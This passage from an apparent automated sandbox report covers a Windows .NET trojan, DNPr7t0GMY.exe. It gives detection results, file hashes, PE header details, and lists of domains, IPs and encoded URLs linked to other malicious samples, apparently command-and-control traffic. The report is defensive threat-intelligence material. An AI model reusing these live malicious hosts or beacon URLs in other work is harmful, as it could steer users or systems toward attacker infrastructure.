                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • HDC enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.evad.winEXE@7/1@13/10
                                                                                          EGA Information:Failed
                                                                                          HDC Information:
                                                                                          • Successful, ratio: 24.2% (good quality ratio 21.4%)
                                                                                          • Quality average: 69.5%
                                                                                          • Quality standard deviation: 33.1%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          • Number of executed functions: 77
                                                                                          • Number of non-executed functions: 129
                                                                                          Cookbook Comments:
                                                                                          • Adjust boot time
                                                                                          • Enable AMSI
                                                                                          Warnings:
                                                                                          Show All
                                                                                          • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 52.255.188.83, 23.211.6.115, 168.61.161.212, 184.30.20.56, 20.50.102.62, 2.20.142.210, 2.20.142.209, 51.103.5.186, 92.122.213.194, 92.122.213.247, 20.54.26.129
                                                                                          • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, vip2-par02p.wns.notify.trafficmanager.net
                                                                                          • Not all processes where analyzed, report is missing behavior information

                                                                                          Simulations

                                                                                          Behavior and APIs

                                                                                          TimeTypeDescription
                                                                                          19:12:26API Interceptor1x Sleep call for process: DNPr7t0GMY.exe modified

                                                                                          Joe Sandbox View / Context

                                                                                          IPs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                          142.111.47.2Letter 09JUN 2021.xlsxGet hashmaliciousBrowse
                                                                                          • www.yunlimall.com/p2io/?fxo=4hXPulH8&7nn48v3P=FG8u3oFfRE5XA1/EPClu9ACxgqrSnZ6gPOMyaYsdv+YEYVVrg2Qkx6tP1TXHrOs8ZSpFIA==
                                                                                          tzeEeC2CBA.exeGet hashmaliciousBrowse
                                                                                          • www.yunlimall.com/p2io/?Yr0=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN2277wuYPWT81&6lFp-=X8U4Iv
                                                                                          ye4nYRzxJa.exeGet hashmaliciousBrowse
                                                                                          • www.yunlimall.com/p2io/?V6=r8hHaZdhBhPHdl&Apg8K=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN21bBg/43M0dy
                                                                                          U4JZ8cQqvU.exeGet hashmaliciousBrowse
                                                                                          • www.yunlimall.com/p2io/?z8I4HhO=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN2277wuYPWT81&6lyPdB=iR-deNZP3
                                                                                          IsIMH5zplo.exeGet hashmaliciousBrowse
                                                                                          • www.yunlimall.com/p2io/?n2MLF0Ux=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN2277wuYPWT81&Dj6t=CpStsPY
                                                                                          7LQAaB3oH4.exeGet hashmaliciousBrowse
                                                                                          • www.yunlimall.com/p2io/?JvHxx=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN2277wuYPWT81&I48=AFQl7ZhpHxzl
                                                                                          feAfWrgHcX.exeGet hashmaliciousBrowse
                                                                                          • www.yunlimall.com/p2io/?BvL=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN21X4seU3byBjR4fh0g==&tXxd=M69Tz
                                                                                          a6362829_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                          • www.yunlimall.com/p2io/?8pMhHJUH=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN227RveoPSR01&Gzux=XB2LdrUxY
                                                                                          e759c6e8_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                          • www.yunlimall.com/p2io/?rVLp5Z=S0GhCH_&RPx=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN21bBg/43M0dy
                                                                                          5PthEm83NG.exeGet hashmaliciousBrowse
                                                                                          • www.yunlimall.com/p2io/?NtTdgz=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN21X4seU3byBjR4fh0g==&1bj=mj88chf8ThLT
                                                                                          Introduction APRIL 15 2020.xlsxGet hashmaliciousBrowse
                                                                                          • www.yunlimall.com/p2io/?QJ=h484VFbPZ8O&Ztxhw=FG8u3oFfRE5XA1/EPClu9ACxgqrSnZ6gPOMyaYsdv+YEYVVrg2Qkx6tP1TXHrOs8ZSpFIA==
                                                                                          u87sEvt9v3.exeGet hashmaliciousBrowse
                                                                                          • www.yunlimall.com/p2io/?wh=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN21XBzv00VkdkR4fmnQ==&BR=CpFH
                                                                                          g2qwgG2xbe.exeGet hashmaliciousBrowse
                                                                                          • www.yunlimall.com/p2io/?Ezut_6Ph=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN227RveoPSR01&lhuLO=TxllZ2B
                                                                                          1ucvVfbHnD.exeGet hashmaliciousBrowse
                                                                                          • www.yunlimall.com/p2io/?DXOl_=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN21bBg/43M0dy&KtxH=PnCDGxnP7
                                                                                          g0g865fQ2S.exeGet hashmaliciousBrowse
                                                                                          • www.yunlimall.com/p2io/?4h3=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN227RveoPSR01&vTapK=LJBpc8p
                                                                                          ZwNJI24QAf.exeGet hashmaliciousBrowse
                                                                                          • www.yunlimall.com/p2io/?8p=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN21X4seU3byBjR4fh0g==&ChOh3=H0Gdhfb
                                                                                          23.82.57.32qXDtb88hht.exeGet hashmaliciousBrowse
                                                                                          • www.ruhexuangou.com/p2io/?Z8E=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1uLBueD84dbw&b0GDi6=Q6Ahtfox
                                                                                          wMKDi0Ss3f.exeGet hashmaliciousBrowse
                                                                                          • www.ruhexuangou.com/p2io/?4hfHN=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1uLrxuz88fTw&y4=2doLnT
                                                                                          Request For Courtesy Call 7710090112332.xlsxGet hashmaliciousBrowse
                                                                                          • www.ruhexuangou.com/p2io/?8p-PuhEX=WkKybY+BW5ZBczdH4hKPcEEM/Z4gp4PnllJ4lZDhA9T5haocRpsPFf0I2LnXqOHPzeGA4A==&2djd=h6A8bhqxX4-P8B-0
                                                                                          bin.exeGet hashmaliciousBrowse
                                                                                          • www.ruhexuangou.com/p2io/?uN9hQ=ejlP_vuP4dl4N6&qFQl7Pf8=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1trRh/TEm4y3
                                                                                          b02c0831_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                          • www.ruhexuangou.com/p2io/?M6AlS=yVFP-hwh&Bv=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1tnote/Ex+umh37wog==
                                                                                          Contract MAY2021.xlsxGet hashmaliciousBrowse
                                                                                          • www.ruhexuangou.com/p2io/?Ozu4_XoX=WkKybY+BW5ZBczdH4hKPcEEM/Z4gp4PnllJ4lZDhA9T5haocRpsPFf0I2LnXqOHPzeGA4A==&hhD0=gXzt_B
                                                                                          92bd9987_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                          • www.ruhexuangou.com/p2io/?Ulm=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1tnRyvfH/oyhh3737Q==&SVg84P=yjR8DXLxiJb
                                                                                          RDAx9iDSEL.exeGet hashmaliciousBrowse
                                                                                          • www.ruhexuangou.com/p2io/?NtTdXn=wXL40t9Hkrxhn&KtxL=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1uLBueD84dbw
                                                                                          5PthEm83NG.exeGet hashmaliciousBrowse
                                                                                          • www.ruhexuangou.com/p2io/?NtTdgz=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1tnote/Ex+umh37wog==&1bj=mj88chf8ThLT
                                                                                          k7AgZOwF4S.exeGet hashmaliciousBrowse
                                                                                          • www.ruhexuangou.com/p2io/?vT=LJBt&5j3=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1uLBueD84dbw
                                                                                          q3uHPdoxWP.exeGet hashmaliciousBrowse
                                                                                          • www.ruhexuangou.com/p2io/?N4=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1uLBueD84dbw&2d=Yn8xRlsx
                                                                                          NMpDBwHJP8.exeGet hashmaliciousBrowse
                                                                                          • www.ruhexuangou.com/p2io/?Jv4=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1tnRyvfH/oyhh3737Q==&NvTHEh=QR-x_26P2h
                                                                                          pCkqlKXv05.exeGet hashmaliciousBrowse
                                                                                          • www.ruhexuangou.com/p2io/?EzrxGfnx=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1tnote/Ex+umh37wog==&ojr0k=Sxo0U4
                                                                                          u87sEvt9v3.exeGet hashmaliciousBrowse
                                                                                          • www.ruhexuangou.com/p2io/?wh=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1tnRyvfH/oyhh3737Q==&BR=CpFH
                                                                                          Processed APR12.xlsxGet hashmaliciousBrowse
                                                                                          • www.ruhexuangou.com/p2io/?oN6xpP=WkKybY+BW5ZBczdH4hKPcEEM/Z4gp4PnllJ4lZDhA9T5haocRpsPFf0I2LnXqOHPzeGA4A==&NreTZ=JJE0B4uP-Jd
                                                                                          36ne6xnkop.exeGet hashmaliciousBrowse
                                                                                          • www.ruhexuangou.com/p2io/?1bVpY=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1uLBueD84dbw&TVg8Ar=tFNd1Vlhj2qp
                                                                                          Customer-100912288113.xlsxGet hashmaliciousBrowse
                                                                                          • www.ruhexuangou.com/p2io/?YPxxw=JxlLiTVHLV_&4h=WkKybY+BW5ZBczdH4hKPcEEM/Z4gp4PnllJ4lZDhA9T5haocRpsPFf0I2LnXqOHPzeGA4A==
                                                                                          Gt8AN6GiOD.exeGet hashmaliciousBrowse
                                                                                          • www.ruhexuangou.com/p2io/?JtxH=XPs0s4JPf&n8Ehjz3=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1uLrxuz88fTw
                                                                                          foHzqhWjvn.exeGet hashmaliciousBrowse
                                                                                          • www.ruhexuangou.com/p2io/?wR=MHQD&4h0=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1trRh/TEm4y3
                                                                                          27hKPHrVa3.exeGet hashmaliciousBrowse
                                                                                          • www.ruhexuangou.com/p2io/?RR=YrKhZvg&rp=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1uLrxuz88fTw

                                                                                          Domains

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                          www.yunlimall.comLetter 09JUN 2021.xlsxGet hashmaliciousBrowse
                                                                                          • 142.111.47.2
                                                                                          tzeEeC2CBA.exeGet hashmaliciousBrowse
                                                                                          • 142.111.47.2
                                                                                          ye4nYRzxJa.exeGet hashmaliciousBrowse
                                                                                          • 142.111.47.2
                                                                                          U4JZ8cQqvU.exeGet hashmaliciousBrowse
                                                                                          • 142.111.47.2
                                                                                          IsIMH5zplo.exeGet hashmaliciousBrowse
                                                                                          • 142.111.47.2
                                                                                          7LQAaB3oH4.exeGet hashmaliciousBrowse
                                                                                          • 142.111.47.2
                                                                                          bin.exeGet hashmaliciousBrowse
                                                                                          • 142.111.47.2
                                                                                          feAfWrgHcX.exeGet hashmaliciousBrowse
                                                                                          • 142.111.47.2
                                                                                          a6362829_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                          • 142.111.47.2
                                                                                          e759c6e8_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                          • 142.111.47.2
                                                                                          5PthEm83NG.exeGet hashmaliciousBrowse
                                                                                          • 142.111.47.2
                                                                                          Introduction APRIL 15 2020.xlsxGet hashmaliciousBrowse
                                                                                          • 142.111.47.2
                                                                                          u87sEvt9v3.exeGet hashmaliciousBrowse
                                                                                          • 142.111.47.2
                                                                                          g2qwgG2xbe.exeGet hashmaliciousBrowse
                                                                                          • 142.111.47.2
                                                                                          1ucvVfbHnD.exeGet hashmaliciousBrowse
                                                                                          • 142.111.47.2
                                                                                          g0g865fQ2S.exeGet hashmaliciousBrowse
                                                                                          • 142.111.47.2
                                                                                          ZwNJI24QAf.exeGet hashmaliciousBrowse
                                                                                          • 142.111.47.2
                                                                                          www.brunoecatarina.comLetter 09JUN 2021.xlsxGet hashmaliciousBrowse
                                                                                          • 54.85.86.211
                                                                                          Request For Courtesy Call 7710090112332.xlsxGet hashmaliciousBrowse
                                                                                          • 54.85.86.211
                                                                                          9XfX7aaf3F.exeGet hashmaliciousBrowse
                                                                                          • 54.85.86.211
                                                                                          xhbUdeAoVP.exeGet hashmaliciousBrowse
                                                                                          • 54.85.86.211
                                                                                          wFlt84ubSH.exeGet hashmaliciousBrowse
                                                                                          • 54.85.86.211
                                                                                          KWX1rM9GB0.exeGet hashmaliciousBrowse
                                                                                          • 54.85.86.211
                                                                                          2UPdDxaAmt.exeGet hashmaliciousBrowse
                                                                                          • 54.85.86.211
                                                                                          e759c6e8_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                          • 54.85.86.211
                                                                                          APPROVED.xlsxGet hashmaliciousBrowse
                                                                                          • 54.85.86.211
                                                                                          o52k2obPCG.exeGet hashmaliciousBrowse
                                                                                          • 54.85.86.211
                                                                                          q3uHPdoxWP.exeGet hashmaliciousBrowse
                                                                                          • 54.85.86.211
                                                                                          uNttFPI36y.exeGet hashmaliciousBrowse
                                                                                          • 54.85.86.211
                                                                                          Introduction APRIL 15 2020.xlsxGet hashmaliciousBrowse
                                                                                          • 54.85.86.211
                                                                                          pumYguna1i.exeGet hashmaliciousBrowse
                                                                                          • 54.85.86.211
                                                                                          Q1VDYnqeBX.exeGet hashmaliciousBrowse
                                                                                          • 54.85.86.211
                                                                                          KL9fcbfrMB.exeGet hashmaliciousBrowse
                                                                                          • 54.85.86.211
                                                                                          1LHKlbcoW3.exeGet hashmaliciousBrowse
                                                                                          • 54.85.86.211
                                                                                          27hKPHrVa3.exeGet hashmaliciousBrowse
                                                                                          • 54.85.86.211
                                                                                          prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comSecuriteInfo.com.Trojan.Packed2.43183.29557.exeGet hashmaliciousBrowse
                                                                                          • 13.59.53.244
                                                                                          Letter 09JUN 2021.xlsxGet hashmaliciousBrowse
                                                                                          • 52.14.32.15
                                                                                          PO#78765439.ZIP.exeGet hashmaliciousBrowse
                                                                                          • 52.14.32.15
                                                                                          New Order Vung Ang TPP Viet Nam.exeGet hashmaliciousBrowse
                                                                                          • 3.143.65.214
                                                                                          PROFORMA FATURA PDF.exeGet hashmaliciousBrowse
                                                                                          • 13.59.53.244
                                                                                          6dTTv9IdCw.exeGet hashmaliciousBrowse
                                                                                          • 3.143.65.214
                                                                                          Telex_Payment.exeGet hashmaliciousBrowse
                                                                                          • 52.14.32.15
                                                                                          STATEMENT.exeGet hashmaliciousBrowse
                                                                                          • 13.59.53.244
                                                                                          QyKNw7NioL.exeGet hashmaliciousBrowse
                                                                                          • 3.143.65.214
                                                                                          SKMBT41085NC9.exeGet hashmaliciousBrowse
                                                                                          • 52.14.32.15
                                                                                          CC for account.exeGet hashmaliciousBrowse
                                                                                          • 13.59.53.244
                                                                                          CARGO ARRIVAL NOTICE-MEDICOM AWB.exeGet hashmaliciousBrowse
                                                                                          • 52.14.32.15
                                                                                          statement.exeGet hashmaliciousBrowse
                                                                                          • 52.14.32.15
                                                                                          CONTRACT SWIFT.exeGet hashmaliciousBrowse
                                                                                          • 52.14.32.15
                                                                                          RE; KOC RFQ for Flangers - RFQ 22965431.exeGet hashmaliciousBrowse
                                                                                          • 52.14.32.15
                                                                                          PO 0003789311.exeGet hashmaliciousBrowse
                                                                                          • 13.59.53.244
                                                                                          tgb4.exeGet hashmaliciousBrowse
                                                                                          • 13.59.53.244
                                                                                          transferencia bancaria.exeGet hashmaliciousBrowse
                                                                                          • 52.15.160.167
                                                                                          SHIPPING DOCUMENT_7048555233PDF.exeGet hashmaliciousBrowse
                                                                                          • 3.143.65.214
                                                                                          item.exeGet hashmaliciousBrowse
                                                                                          • 13.59.53.244

                                                                                          ASN

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                          LEASEWEB-USA-SFO-12USlTAPQJikGw.exeGet hashmaliciousBrowse
                                                                                          • 147.255.162.204
                                                                                          FORM C1.xlsxGet hashmaliciousBrowse
                                                                                          • 147.255.162.204
                                                                                          qXDtb88hht.exeGet hashmaliciousBrowse
                                                                                          • 23.82.57.32
                                                                                          6dTTv9IdCw.exeGet hashmaliciousBrowse
                                                                                          • 147.255.162.204
                                                                                          wMKDi0Ss3f.exeGet hashmaliciousBrowse
                                                                                          • 23.82.57.32
                                                                                          ENrFQVzLHE.exeGet hashmaliciousBrowse
                                                                                          • 147.255.162.204
                                                                                          Request For Courtesy Call 7710090112332.xlsxGet hashmaliciousBrowse
                                                                                          • 23.82.57.32
                                                                                          xhbUdeAoVP.exeGet hashmaliciousBrowse
                                                                                          • 147.255.162.204
                                                                                          bin.exeGet hashmaliciousBrowse
                                                                                          • 23.82.57.32
                                                                                          b02c0831_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                          • 23.82.57.32
                                                                                          Contract MAY2021.xlsxGet hashmaliciousBrowse
                                                                                          • 147.255.162.204
                                                                                          Compliance A.xlsxGet hashmaliciousBrowse
                                                                                          • 147.255.162.204
                                                                                          Wire Payment Of $35,276.70.exeGet hashmaliciousBrowse
                                                                                          • 23.106.92.86
                                                                                          a6362829_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                          • 147.255.162.204
                                                                                          92bd9987_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                          • 147.255.162.204
                                                                                          e759c6e8_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                          • 147.255.162.204
                                                                                          NEW ORDER SOR 10531220.exeGet hashmaliciousBrowse
                                                                                          • 172.255.115.89
                                                                                          BANK-ACCOUNT. NUMBER.PDF.exeGet hashmaliciousBrowse
                                                                                          • 172.255.115.119
                                                                                          126-21-11HAR.exeGet hashmaliciousBrowse
                                                                                          • 172.255.208.73
                                                                                          PO#10244.exeGet hashmaliciousBrowse
                                                                                          • 23.82.175.79
                                                                                          EGIHOSTINGUSLetter 09JUN 2021.xlsxGet hashmaliciousBrowse
                                                                                          • 142.111.47.2
                                                                                          lLJGwAgWDh.exeGet hashmaliciousBrowse
                                                                                          • 104.252.75.149
                                                                                          Invoice number FV0062022020.exeGet hashmaliciousBrowse
                                                                                          • 104.164.109.43
                                                                                          tzeEeC2CBA.exeGet hashmaliciousBrowse
                                                                                          • 142.111.47.2
                                                                                          RFQ.exeGet hashmaliciousBrowse
                                                                                          • 136.0.84.126
                                                                                          ye4nYRzxJa.exeGet hashmaliciousBrowse
                                                                                          • 104.252.121.237
                                                                                          U4JZ8cQqvU.exeGet hashmaliciousBrowse
                                                                                          • 142.111.47.2
                                                                                          IsIMH5zplo.exeGet hashmaliciousBrowse
                                                                                          • 142.111.47.2
                                                                                          SOA #093732.exeGet hashmaliciousBrowse
                                                                                          • 172.120.222.45
                                                                                          Invoice.exeGet hashmaliciousBrowse
                                                                                          • 107.165.45.157
                                                                                          CC for account.exeGet hashmaliciousBrowse
                                                                                          • 107.165.149.13
                                                                                          SKMBT_C224307532DL23457845_Product Order doc.exeGet hashmaliciousBrowse
                                                                                          • 104.253.112.105
                                                                                          HQvI0y1Wu4.exeGet hashmaliciousBrowse
                                                                                          • 107.165.37.235
                                                                                          KAZOX MATERIALS SDN BHD Purchase Order.exeGet hashmaliciousBrowse
                                                                                          • 172.120.222.52
                                                                                          CONTRACT 312000H123 SSR ADVICE 31-05-2021 (1).xlsxGet hashmaliciousBrowse
                                                                                          • 104.252.121.237
                                                                                          003 SOA.exeGet hashmaliciousBrowse
                                                                                          • 104.164.224.68
                                                                                          Items and Specification Needed for RFQ546092227865431209PDF.exeGet hashmaliciousBrowse
                                                                                          • 45.38.86.100
                                                                                          SKMBT_C22421033008180 png.exeGet hashmaliciousBrowse
                                                                                          • 104.252.192.27
                                                                                          Swift copy_9808.exeGet hashmaliciousBrowse
                                                                                          • 107.164.104.228
                                                                                          Order756576747876874653.gz.exeGet hashmaliciousBrowse
                                                                                          • 104.164.6.147
                                                                                          AMAZON-02USlTAPQJikGw.exeGet hashmaliciousBrowse
                                                                                          • 99.83.154.118
                                                                                          SKlGhwkzTi.exeGet hashmaliciousBrowse
                                                                                          • 44.227.65.245
                                                                                          SecuriteInfo.com.Trojan.Packed2.43183.29557.exeGet hashmaliciousBrowse
                                                                                          • 13.59.53.244
                                                                                          Letter 1019.xlsxGet hashmaliciousBrowse
                                                                                          • 18.140.1.169
                                                                                          #U260e#Ufe0f Zeppelin.com AudioMessage_259-55.HTMGet hashmaliciousBrowse
                                                                                          • 143.204.98.37
                                                                                          Proforma Invoice and Bank swift-REG.PI-0086547654.exeGet hashmaliciousBrowse
                                                                                          • 75.2.26.18
                                                                                          U03c2doc.exeGet hashmaliciousBrowse
                                                                                          • 108.128.238.226
                                                                                          Letter 09JUN 2021.xlsxGet hashmaliciousBrowse
                                                                                          • 18.140.1.169
                                                                                          Docc.htmlGet hashmaliciousBrowse
                                                                                          • 13.224.99.74
                                                                                          ManyToOneMailMerge Ver 18.2.dotmGet hashmaliciousBrowse
                                                                                          • 52.209.246.140
                                                                                          Sleek_Free.exeGet hashmaliciousBrowse
                                                                                          • 143.204.209.58
                                                                                          ManyToOneMailMerge Ver 18.2.dotmGet hashmaliciousBrowse
                                                                                          • 52.216.141.230
                                                                                          #Ud83d#Udcde_#U25b6#Ufe0f.htmGet hashmaliciousBrowse
                                                                                          • 15.236.176.210
                                                                                          WV Northern Community College.docxGet hashmaliciousBrowse
                                                                                          • 52.43.249.183
                                                                                          wzdu53.exeGet hashmaliciousBrowse
                                                                                          • 13.249.13.113
                                                                                          com.duolingo_1162_apps.evozi.com.apkGet hashmaliciousBrowse
                                                                                          • 52.222.174.5
                                                                                          rnPij0Z886.dllGet hashmaliciousBrowse
                                                                                          • 13.224.91.73
                                                                                          Plex-v8.7.1.20931_build_812981296-armeabi-v7a(Apkgod.net).apkGet hashmaliciousBrowse
                                                                                          • 99.81.164.127
                                                                                          Nota Fiscal Eletronica 00111834.msiGet hashmaliciousBrowse
                                                                                          • 54.171.246.133
                                                                                          #U00a0Import Custom Duty invoice & its clearance documents.exeGet hashmaliciousBrowse
                                                                                          • 75.2.26.18

                                                                                          JA3 Fingerprints

                                                                                          No context

                                                                                          Dropped Files

                                                                                          No context

                                                                                          Created / dropped Files

                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DNPr7t0GMY.exe.log
                                                                                          Process:C:\Users\user\Desktop\DNPr7t0GMY.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1314
                                                                                          Entropy (8bit):5.350128552078965
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                                                          MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                                                          SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                                                          SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                                                          SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                                                          Malicious:true
                                                                                          Reputation:high, very likely benign file
                                                                                          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                                          Static File Info

                                                                                          General

                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Entropy (8bit):5.951478829434799
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                          • Windows Screen Saver (13104/52) 0.07%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                          File name:DNPr7t0GMY.exe
                                                                                          File size:1325568
                                                                                          MD5:f41951980d050c8fe13c8a2e31e55b94
                                                                                          SHA1:58be890ff4d29b2d17566420c0e455dbfccda9a8
                                                                                          SHA256:12f07790ce9303ed023131642a93d1b62ce4f3d5db8d35ed215d5b2bddc4ff93
                                                                                          SHA512:d24c50ba24c26e0463155092d4d26979e7bcbd264e76fcdeb196f9d906a419366d898719d80aa2e707fefe55ee595b2e5bdaf52c101decf6c556a4545712b1ec
                                                                                          SSDEEP:12288:idV/yAmyLaEy0eBISuTgUeLiW4/ZKVe7T0Q9sRuwpPCwRk:8VbmT9zXZwZi+IQuRuwxCwRk
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...q..`..............P.............VL... ...`....@.. ....................................@................................

                                                                                          File Icon

                                                                                          Icon Hash:00828e8e8686b000

                                                                                          Static PE Info

                                                                                          General

                                                                                          Entrypoint:0x544c56
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                          Time Stamp:0x60BF8C71 [Tue Jun 8 15:27:45 2021 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:v4.0.30319
                                                                                          OS Version Major:4
                                                                                          OS Version Minor:0
                                                                                          File Version Major:4
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:4
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                          Entrypoint Preview

                                                                                          Instruction
                                                                                          jmp dword ptr [00402000h]
                                                                                          add byte ptr [eax], al
